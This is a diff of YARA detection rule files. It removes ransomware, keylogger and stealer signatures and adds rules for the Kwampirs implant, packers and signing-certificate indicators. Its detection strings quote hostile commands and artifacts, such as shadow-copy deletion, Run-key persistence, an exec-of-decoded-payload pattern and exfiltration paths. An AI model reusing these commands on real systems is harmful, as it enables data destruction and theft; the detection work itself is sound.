ascii - $s2 = "taskkill.exe" ascii - $s3 = "cmd.exe" ascii - $s4 = "Speak.Speak" ascii - $s5 = "CLNTSRVRnull" ascii - $s6 = "-----END" ascii - $s7 = "-----BEGIN" ascii - $s8 = ".EncryptFile" ascii - $g1 = "GoldenAxe/Utils." ascii - $g2 = "GoldenAxe/Cryptography." ascii - $g3 = "GoldenAxe/Walker." ascii - $g4 = "C:/Users/alpha/go/src/GoldenAxe/" ascii - $g5 = "'Golden Axe ransomware'" ascii + $string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 } + $resource_key = { 28 99 B6 17 63 33 EE 22 97 97 55 B5 7A C4 E1 A4 } + $strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3} condition: - uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($g*) and 1 of ($s*))) + (( uint16(0)==0x5a4d) and (2 of them )) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Robbinhood : FILE +rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Implant : FILE { meta: - description = "Robbinhood ransomware payload" - author = "ditekSHen" - id = "a5066a22-3c87-5e9f-a94f-5a44af2f96fd" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L765-L787" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f1c4226ed5cb1583418d5ef0efc2c2b5bc3cfe7f148f359c5d432fd660331a46" + description = "Kwampirs implant xor and rsa keys" + author = "FBI / cywatch@fbi.gov" + id = "d1c1ab0e-e07d-5f0e-97e8-5aee53ab620e" + date = "2020-01-14" + modified = "2020-03-31" + reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L130-L177" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "a9559c17c802c6060799d0a1ee96d68bd521475dd12ff6040a74874cabe3a9a9" score = 75 - quality = 75 + quality = 85 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Robbinhood" + yara_version = "3.7.0" strings: - $go = "Go build ID:" ascii - $cmd1 = "cmd.exe /c" ascii - $cmd2 = "net use * /DELETE" nocase ascii - $cmd3 = "sc.exe stop" ascii - $cmd4 = "vssadmin resize shadowstorage" nocase ascii - $s1 = /Skipping\s(file|dir)/ ascii - $s2 = "Encrypt[ERR] GET Size:" ascii - $s3 = ".taskkilltasklistunknown(" ascii - $s4 = ".sysvssadmin.exewevtutil.exe MB released" ascii - $s5 = ".sysvssadmin.exewevtutil.exewinlogin.exewinlogon.exe MB released" ascii - $s6 = ".enc_robbinhood" ascii - $s7 = "c:\\windows\\temp\\pub.key" nocase ascii - $s8 = "main.CoolMaker" ascii - $s9 = "/valery/go/src/oldboy/" ascii + $string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 } + $beacon_key = { 28 30 A4 3F 6D 28 04 23 36 2A 32 DC AD 0B A0 4B E8 20 1F 64 84 0A F4 C4 C7 8A 8D C0 + A2 C4 40 19 A1 43 82 38 14 FD 6C 90 E0 7E 2A 40 DF D3 F2 3E 72 38 C4 96 4D 98 7C 16 3B 3C E7 27 B7 D0 EF + 7B 3C 45 06 9A 69 0D 6A 41 18 95 95 46 88 CC 19 6F EB 6B 5B F8 51 E4 2E E1 E6 8F 44 CF 20 2F 2B DE 7A 28 + 5D DB 55 5A 1A 35 AF D8 5F 57 B8 0F A5 F7 08 4A D0 AB E5 95 31 A1 25 31 00 65 3C 70 73 99 42 0A 02 1A 69 + D9 A6 DF 14 B2 05 DD A8 DF F5 D9 71 6D 6E 96 5F 1B D1 0F 8E 0A 35 D4 65 FA 90 58 CC 75 02 92 B7 2C 46 ED + 66 33 44 75 FC A4 E0 FD B8 C8 B5 0C 3A 84 D9 23 16 A4 AF 3B 57 C6 D2 5C B3 AB 9C CD F0 B2 A4 51 43 D3 F0 + 30 21 B5 ED 25 E3 64 B7 0C 1C A8 50 3A FF 6B 2C 32 06 B2 D1 54 3D 86 B9 1A BF 59 D7 92 59 EC 40 4A 8D B0 + E7 9A 9A 0D 94 19 27 D8 6D AD 5C 3E BE 14 67 DC F0 92 } + $download_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00 + A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 + B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9 + 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32 + 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E + 7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED + B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 + 74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 } + $hashfile_key = { FE FE F5 5C 37 54 A1 6C 28 84 ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3 1C 33 + 2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19 AA D8 + 42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C 7A 30 + 8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 62 B6 CC C1 45 C9 43 43 15 59 BE 5A 77 31 D8 36 5F BD F6 + D7 09 65 42 3C CD 2C B1 C1 28 55 6E F9 91 3C 55 3B DF EB ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3 + 1C 33 2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19 + AA D8 42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C + 7A 30 8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 } + $rsa_key = { CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E + DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4 + 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2 + A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18 + BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 + 33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 + C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C + 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 } condition: - uint16(0)==0x5a4d and ($go and 1 of ($cmd*) and 3 of ($s*)) + (( uint16(0)==0x5a4d) and (2 of them )) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Getcrypt : FILE +rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon : FILE { meta: - description = "GetCrypt ransomware payload" - author = "ditekSHen" - id = "fb6db807-372f-59e6-96c6-54dd4ece336d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L789-L825" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fd7ee98757c3ac1f2b2a4dd9041c78d33273d7a7d596c3d99c6b8d79988f29f1" + description = "Kwampirs Shamoon overlap" + author = "FBI / cywatch@fbi.gov" + id = "87d28867-383e-5e09-8369-63c8a4e3f966" + date = "2020-01-14" + modified = "2020-03-31" + reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" + source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L200-L221" + license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" + logic_hash = "43f352c3db016d2831d11a13ae6c0baf440fa464560090e00432780df6a8982d" score = 75 - quality = 73 + quality = 60 tags = "FILE" - clamav_sig1 = "MALWARE_Win.Ransomware.GetCrypt-1" - clamav_sig2 = "MALWARE_Win.Ransomware.GetCrypt-2" strings: - $x1 = "delete shadows /all /quiet" wide - $x2 = "C:\\Windows\\System32\\svchost.exe" fullword wide - $x3 = "desk.bmp" fullword wide - $x4 = ":\\Boot" fullword wide - $x5 = "\\encrypted_key.bin" fullword wide - $x6 = "vssadmin.exe" fullword wide - $x7 = ":\\Recovery" fullword wide - $s1 = "CryptEncrypt" fullword ascii - $s2 = "NtWow64ReadVirtualMemory64" fullword ascii - $s3 = "MPR.dll" fullword ascii - $s4 = "%key%" fullword ascii - $s5 = "CryptDestroyKey" fullword ascii - $s6 = "ntdll.dll" fullword ascii - $s7 = "WNetCancelConnection2W" fullword ascii - $s8 = ".%c%c%c%c" fullword wide - $s10 = { 43 72 79 70 74 49 6d 70 6f 72 74 4b 65 79 00 00 - cb 00 43 72 79 70 74 45 6e 63 72 79 70 74 00 00 - c1 00 43 72 79 70 74 41 63 71 75 69 72 65 43 6f - 6e 74 65 78 74 41 00 00 c8 00 43 72 79 70 74 44 - 65 73 74 72 6f 79 4b 65 79 00 d2 00 43 72 79 70 - 74 47 65 6e 52 61 6e 64 6f 6d 00 00 c2 00 43 72 - 79 70 74 41 63 71 75 69 72 65 43 6f 6e 74 65 78 - 74 57 00 00 41 44 56 41 50 49 33 32 2e 64 6c 6c - 00 00 b5 01 53 68 65 6c 6c 45 78 65 63 75 74 65 - 45 78 57 00 53 48 45 4c 4c 33 32 2e 64 6c 6c 00 } + $s1 = "g\\system32\\" fullword wide + $s2 = "ztvttw" fullword wide + $s3 = "lwizvm" fullword ascii + $op1 = { 94 35 77 73 03 40 eb e9 } + $op2 = { 80 7c 41 01 00 74 0a 3d } + $op3 = { 74 0a 3d 00 94 35 77 } condition: - uint16(0)==0x5a4d and (3 of ($x*) or 8 of ($s*)) + (( uint16(0)==0x5a4d) and ( filesize <4000KB) and (3 of them )) } +/* + * YARA Rule Set + * Repository Name: DitekSHen + * Repository: https://github.com/ditekshen/detection + * Retrieval Date: 2024-09-29 + * Git Commit: 6bba6f5266a4c203b63da28b647ddb3acbffb8d1 + * Number of Rules: 1436 + * Skipped: 0 (age), 112 (quality), 0 (score), 0 (importance) + * + * + * LICENSE + * + * Copyright 2021 by ditekSHen (https://github.com/ditekshen/detection). + +The 2-Clause BSD License + +Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: +1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + + */ import "pe" -rule DITEKSHEN_MALWARE_Joego : FILE +rule DITEKSHEN_INDICATOR_JAVA_Packed_Allatori { meta: - description = "JoeGo ransomware payload" + description = "Detects files packed with Allatori Java Obfuscator" author = "ditekSHen" - id = "23d38bcd-e66d-5ff1-ad6a-3e6432d83562" - date = "2024-09-06" - modified = "2024-09-06" + id = "16b9f455-ba73-5f09-9822-8349c53fa965" + date = "2023-08-29" + modified = "2023-08-29" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L827-L847" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3ddf3506aefb3cd1845f9daa689848a02a2422ca98c5c984bc918cc7ea2b2677" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_packed.yar#L113-L121" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ac48a573eb9d9fffe38d09993ff062f308edb07b8a7498e332cc3eb501d48db7" score = 75 quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.JoeGo" + tags = "" + importance = 20 strings: - $go = "Go build ID:" ascii - $s1 = "%SystemRoot%\\system32\\%v." ascii - $s2 = "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V" ascii - $s3 = "/t REG_SZ /F /D %userprofile%\\" ascii - $s4 = "(sensitive) [recovered]" ascii - $s5 = "/dev/stderr/dev/stdout/index.html" ascii - $s6 = "%userprofile%\\SystemApps" ascii - $s7 = "p=<br>ACDTACSTAEDTAESTAKDTAKSTAWSTA" ascii - $cnc1 = "/detail.php" ascii - $cnc2 = "/checkin.php" ascii - $cnc3 = "/platebni_brana.php" ascii - $cnc4 = "://nebezpecnyweb.eu/" ascii + $s1 = "# Obfuscation by Allatori Obfuscator" ascii wide condition: - uint16(0)==0x5a4d and $go and ( all of ($s*) or (3 of ($s*) and 1 of ($cnc*))) + all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Aurora : FILE +rule DITEKSHEN_INDICATOR_EXE_Python_Byte_Compiled : FILE { meta: - description = "Aurora ransomware payload" + description = "Detects python-byte compiled executables" author = "ditekSHen" - id = "d3eafe9c-c8d9-5744-ba5d-4eb0249cceea" - date = "2024-09-06" - modified = "2024-09-06" + id = "04ae604c-6176-54cf-98e9-4386e52420f8" + date = "2023-08-29" + modified = "2023-08-29" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L849-L869" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "056bb11e8b947ef90462503db82b2001e4a5d4847fad9c0d5d771384a80d779a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_packed.yar#L211-L220" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "212d525509a4d8fb7f1b5efa929526c8758549bfdb8591c88ce602315e6b3147" score = 75 quality = 75 tags = "FILE" + importance = 20 strings: - $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii wide - $s2 = "#DECRYPT_MY_FILES#.txt" fullword ascii - $s3 = "/gen.php?generate=" fullword ascii - $s4 = "geoplugin.net/php.gp" ascii - $s5 = "/end.php?id=" fullword ascii - $s6 = "wotreplay" fullword ascii - $s7 = "moneywell" fullword ascii - $s8 = "{btc}" fullword ascii - $s9 = ".?AV_Locimp@locale@std@@" ascii - $s10 = ".?AV?$codecvt@DDU_Mbstatet@@@std@@" ascii - $s11 = ".?AU_Crt_new_delete@std@@" ascii - $pdb1 = "\\z0ddak\\Desktop\\source\\Release\\Ransom.pdb" ascii - $pdb2 = "\\Desktop\\source\\Release\\Ransom.pdb" ascii + $s1 = "b64decode" ascii + $s2 = "decompress" ascii condition: - uint16(0)==0x5a4d and ((1 of ($pdb*) and 5 of ($s*)) or (8 of them )) + uint32(0)==0x0a0df303 and filesize <5KB and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Buran : FILE +rule DITEKSHEN_INDICATOR_MSI_EXE2MSI : FILE { meta: - description = "Buran ransomware payload" + description = "Detects executables converted to .MSI packages using a free online converter." author = "ditekSHen" - id = "1433bac5-2ece-54bb-8e57-b5834fffc719" - date = "2024-09-06" - modified = "2024-09-06" + id = "039df7b6-e4bf-5537-ae5b-f2168044e77e" + date = "2023-08-29" + modified = "2023-08-29" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L871-L903" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "eaf50d824dbade0ca63fafc5b4a376553039de9b51a0f6387cb28c8f91a7e0b9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_packed.yar#L222-L233" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "afd48b54766600805ae1aeef13b11de4ca160ea1f96419a4090ab9dae55fa4cd" score = 75 - quality = 73 + quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Ransomware.Buran" + snort2_sid = "930061-930063" + snort3_sid = "930022" + importance = 20 strings: - $v1_1 = "U?$error_info_injector@V" ascii - $v1_2 = "Browse for Folder (FTP)" fullword ascii - $v1_3 = "Find/Replace in Files" fullword ascii - $v1_4 = "PAHKLM" fullword ascii - $v1_5 = "PAHKCR" fullword ascii - $v1_6 = "chkOpt_" ascii - $h1 = "Search <a href=\"location\" class=\"menu\">in this folder</a>" ascii - $h2 = "<br>to find where the text below" ascii - $h3 = "</a> files with these extensions (separate with semi-colons)" ascii - $h4 = "Need help with <a href=\"" ascii - $path = "\\work\\cr\\nata\\libs\\boost_" wide - $v2_1 = "(ShlObj" fullword ascii - $v2_2 = "\\StreamUnit" fullword ascii - $v2_3 = "TReadme" fullword ascii - $v2_4 = "TDrivesAndShares" fullword ascii - $v2_5 = "TCustomMemoryStreamD" fullword ascii - $v2_6 = "OpenProcessToken" fullword ascii - $v2_7 = "UrlMon" fullword ascii - $v2_8 = "HttpSendRequestA" fullword ascii - $v2_9 = "InternetConnectA" fullword ascii - $v2_10 = "FindFiles" fullword ascii - $v2_12 = "$*@@@*$@@@$" ascii + $winin = "Windows Installer" ascii + $title = "Exe to msi converter free" ascii condition: - uint16(0)==0x5a4d and ((( all of ($v1*) and 1 of ($h*)) or ($path and 2 of ($v1*) and 1 of ($h*)) or 10 of them ) or all of ($v2*)) + uint32(0)==0xe011cfd0 and ($winin and $title) } import "pe" -rule DITEKSHEN_MALWARE_Win_Masslogger : FILE +rule DITEKSHEN_INDICATOR_PY_Packed_Pyminifier : FILE { meta: - description = "MassLogger keylogger payload" + description = "Detects python code potentially obfuscated using PyMinifier" author = "ditekSHen" - id = "9181b89a-2ce8-59b6-9703-c01a8471b8d6" - date = "2024-09-06" - modified = "2024-09-06" + id = "a111c116-a2b3-5689-8d44-221adf37e932" + date = "2023-08-29" + modified = "2023-08-29" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L905-L934" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7d8bbefa71a1eb20cd9d029bd516d6c37e39cfa053ed0617eace200d210d9b58" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_packed.yar#L331-L339" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "c7e916906d4654215de6d12e1bff790f24bcf69e97a7e5314a2a057a91b135a3" score = 75 - quality = 73 + quality = 75 tags = "FILE" + importance = 20 strings: - $s1 = "MassLogger v" ascii wide - $s2 = "MassLogger Started:" ascii wide - $s3 = "MassLogger Process:" ascii wide - $s4 = "/panel/upload.php" wide - $s5 = "ftp://" wide - $s6 = "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" fullword wide - $s7 = "^(.*/)?([^/\\\\.]+/\\\\.\\\\./)(.+)$" fullword wide - $s8 = "Bot Killer" ascii - $s9 = "Keylogger And Clipboard" ascii - $c1 = "costura.ionic.zip.reduced.dll.compressed" fullword ascii - $c2 = "CHECKvUNIQUEq" fullword ascii - $c3 = "HOOK/MEMORY6" fullword ascii - $c4 = "Massfile" ascii wide - $c5 = "Fz=[0-9]*'skips*" fullword ascii - $c6 = ":=65535zO" fullword ascii - $c7 = "!$!%!&!'!(!)!*!.!/!0!4!" fullword ascii - $c8 = "5!9!:!<!>!@!E!G!J!K!L!N!O!P!`!" fullword ascii - $c9 = "dllToLoad" fullword ascii - $c10 = "set_CreateNoWindow" fullword ascii - $c11 = "FtpWebRequest" fullword ascii - $c12 = "encryptedUsername" fullword ascii - $c13 = "encryptedPassword" fullword ascii + $s1 = "exec(lzma.decompress(base64.b64decode(" condition: - ( uint16(0)==0x5a4d and 9 of ($c*)) or (5 of ($s*) or 9 of ($c*)) + ( uint32(0)==0x6f706d69 or uint16(0)==0x2123 or uint16(0)==0x0a0d or uint16(0)==0x5a4d) and all of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Echelon : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Bazarloader : FILE { meta: - description = "Echelon information stealer payload" - author = "ditekSHen" - id = "e13d2003-c755-5dd3-bb16-8e41dd19a151" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Bazar executables with specific email addresses found in the code signing certificate" + author = "ditekShen" + id = "94b814e3-56c2-5cdb-9335-c92eea8ec668" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L936-L957" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c070bf52cc51dd334ea24614e33eaa2b7b1a17e7790e586cbbb8c7e33ba1bd76" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L11-L21" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "fd47a1d996c78a6efc144f0fe0a28951c34becab3101e7d25acc980bb6b9f8ce" score = 75 - quality = 75 + quality = 71 tags = "FILE" strings: - $s1 = "<GetStealer>b__" ascii - $s2 = "clearMac" fullword ascii - $s3 = "path2save" fullword ascii - $s4 = "Echelon_Size" fullword ascii - $s5 = "Echelon Stealer by" wide - $s6 = "get__masterPassword" fullword ascii - $s7 = "DomainDetect" fullword ascii - $s8 = "[^\\u0020-\\u007F]" fullword wide - $s9 = "/sendDocument?chat_id=" wide - $s10 = "//setting[@name='Password']/value" wide - $s11 = "Passwords_Mozilla.txt" fullword wide - $s12 = "Passwords_Edge.txt" fullword wide - $s13 = "@madcod" ascii wide - $pdb = "\\Echelon-Stealer-master\\obj\\Release\\Echelon.pdb" ascii + $s1 = "skarabeyllc@gmail.com" ascii wide nocase + $s2 = "admin@intell-it.ru" ascii wide nocase + $s3 = "support@pro-kon.ru" ascii wide condition: - ( uint16(0)==0x5a4d and (8 of ($s*) or $pdb)) or (8 of ($s*) or $pdb) + uint16(0)==0x5a4d and any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Qulab +rule DITEKSHEN_INDICATOR_KB_ID_Qakbot : FILE { meta: - description = "Qulab information stealer payload or artifacts" - author = "ditekSHen" - id = "6ae24c67-5700-5330-a3bd-d542162faebb" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects QakBot executables with specific email addresses found in the code signing certificate" + author = "ditekShen" + id = "24ad36b2-5022-5f72-b01c-fbb64da20f34" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L959-L983" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "659d828cbef38c6362b612be9bdc05ae820f49c23684e77af6462ea677133284" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L23-L37" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "7a38069b3b553cba1a789dac706638382dae5bb748b0c10ef50138879767b6dd" score = 75 - quality = 75 - tags = "" - clamav_sig = "MALWARE.Win.Trojan.QulabZ-Stealer" + quality = 61 + tags = "FILE" strings: - $x1 = "QULAB CLIPPER + STEALER" ascii wide - $x2 = "MASAD CLIPPER + STEALER" ascii wide - $x3 = "http://teleg.run/Qulab" ascii wide - $x4 = "http://teleg.run/jew_seller" ascii wide - $x5 = "BUY CLIPPER + STEALER" ascii wide - $s1 = "\\Screen.jpg" ascii wide - $s2 = "attrib +s +h \"" ascii wide - $s3 = "\\x86_microsoft-windows-" ascii wide - $s4 = "\\amd64_microsoft-windows-" ascii wide - $s5 = "Desktop TXT File" ascii wide - $s6 = "\\AutoFills.txt" ascii wide - $s7 = "\\CreditCards.txt" ascii wide - $s8 = "a -y -mx9 -ssw" ascii wide - $s9 = "\\Passwords.txt" ascii wide - $s10 = "\\Information.txt" ascii wide - $s11 = "\\getMe" ascii wide + $s1 = "hutter.s94@yahoo.com" ascii wide nocase + $s2 = "andrej.vrear@aol.com" ascii wide nocase + $s3 = "klaus.pedersen@aol.com" ascii wide nocase + $s4 = "a.spendl@aol.com" ascii wide nocase + $s5 = "mjemec@aol.com" ascii wide nocase + $s6 = "robert.sijanec@yahoo.com" ascii wide nocase + $s7 = "mitja.vidovi@aol.com" ascii wide nocase condition: - 9 of them or ((1 of ($x*) and 4 of ($s*)) or 1 of ($x*)) + uint16(0)==0x5a4d and any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Orion : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Amadey : FILE { meta: - description = "Orion Keylogger payload" - author = "ditekSHen" - id = "b380b93b-6ceb-5244-aeca-b1f8f9a5b553" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Amadey executables with specific email addresses found in the code signing certificate" + author = "ditekShen" + id = "f9abbf1d-2077-52a8-bfb0-df3732649624" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L985-L1005" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9e5521ebaf9bdef6dadd2a2a093bd6f87ded023d9a74db126ac8ec9a5f1f9744" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L39-L47" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3df3fe67835f76e51743b1b4fa2cbc48277d82689c2fc27457b4d7d820e56e43" score = 75 quality = 73 tags = "FILE" strings: - $s1 = "\\Ranger.BrowserLogging" ascii 